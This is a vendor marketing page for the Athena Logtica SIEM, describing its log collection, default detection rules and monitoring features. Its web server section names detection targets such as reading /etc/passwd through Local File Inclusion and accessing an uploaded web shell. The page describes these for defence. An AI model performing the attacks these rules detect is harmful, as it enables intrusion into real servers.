Background Image

Athena Logtica

SIEM from Expert Minds of SOC (Security Operation Center)

Collection - From All Relevant Data Sources


Based on Athena Logtica & Athena CTI (Cyber Threat Intelligence), Athena Logtica is a security information and event management (SIEM), collects from all relevant data sources, from network infrastructure, server logs, endpoint agents to remote monitoring.


Discovery - More Than Just Statistics of Collection


Flashy dashboards are nice to have, but someone has to look at them 7x24. Without appropriate rules for identifying Indicators of Compromise (IoCs), SIEM is a storage of collected logs only. Athena Logtica includes default detection rules designed and updated by Security Analysts from our SOCs. These rules covers NetFlow, DNS & HTTP anomalies, Windows Active Directory servers and File Servers, Web Servers, Firewalls, ..etc. user interface is available for adding or changing rules, a scheduler for running the rules and a notification (by email) module if the rules find something, etc. Most SIEM stops here.


Analysis - Attempt To Draw Conclusion


However, highly unlikely a single IoC can be conclusive for security incidents such as ATO (Account Take Over), System Compromise, Data Exfiltration, ... etc. Experienced Security Analysts are needed for attempting to draw conclusions. Please look forward to Athena Analytica, our solution (to be released) for attempting to draw conclusions.
Background Image

Everyday, In Average, A SIEM...

30
GB Logs Collected
41,501
Queries Processed
235
Alerts Generated
0
Actionable Alerts

Athena Logtica

Packaged Software Appliance

No more DIY - Athena NetFlow, Athena CTI, Athena Netica and Athena Logtica, combined with just enough operating system (JeOS) to run optimally in a virtual machine, up and run in minutes.

Anomaly Detections

Statistical Anomaly rules to monitor collected server logs and alerts to any sudden increase in a number of indicators; or Behavioural Anomaly rules to detect privileged access, from new network locations, etc.

Windows Active Directory & File Server

Monitor all user logons in a domain, such as Creation of Privileged Accounts 3 a.m. this morning; extreme access of files in file server by a user account, etc.

Web Server

Attempt to read /etc/passwd, obviously a Local File Inclusion Attempt; Attacker uploaded a web shell and is accessing it from web server, with response code 200,.. etc.

Host based Security Monitoring

File Integrity Monitoring to discover a new scheduled job was created; Performance Monitoring to discover CPU utilisation exceeds 85% for the past hour, etc.

Remote Monitoring

WebWatch downloads designated web pages periodically to verify availability & presence of malicious content; DNSWatch checks online periodically if any change of the mappings of DNS hostname and IP address(es).

Key Benefits

Actionable Security Intelligence

Use entire network as a sensor by turning massive amounts of data from existing network infrastructure into actionable security intelligence.

Faster Threat Detection

With the combination of network visibility and cyber threat intelligence, can detect threats faster and more comprehensively.

Affordable & Working

The Athena NetFlow is affordable, easy to install & a working Network Security Monitoring solution, good for SME, like us.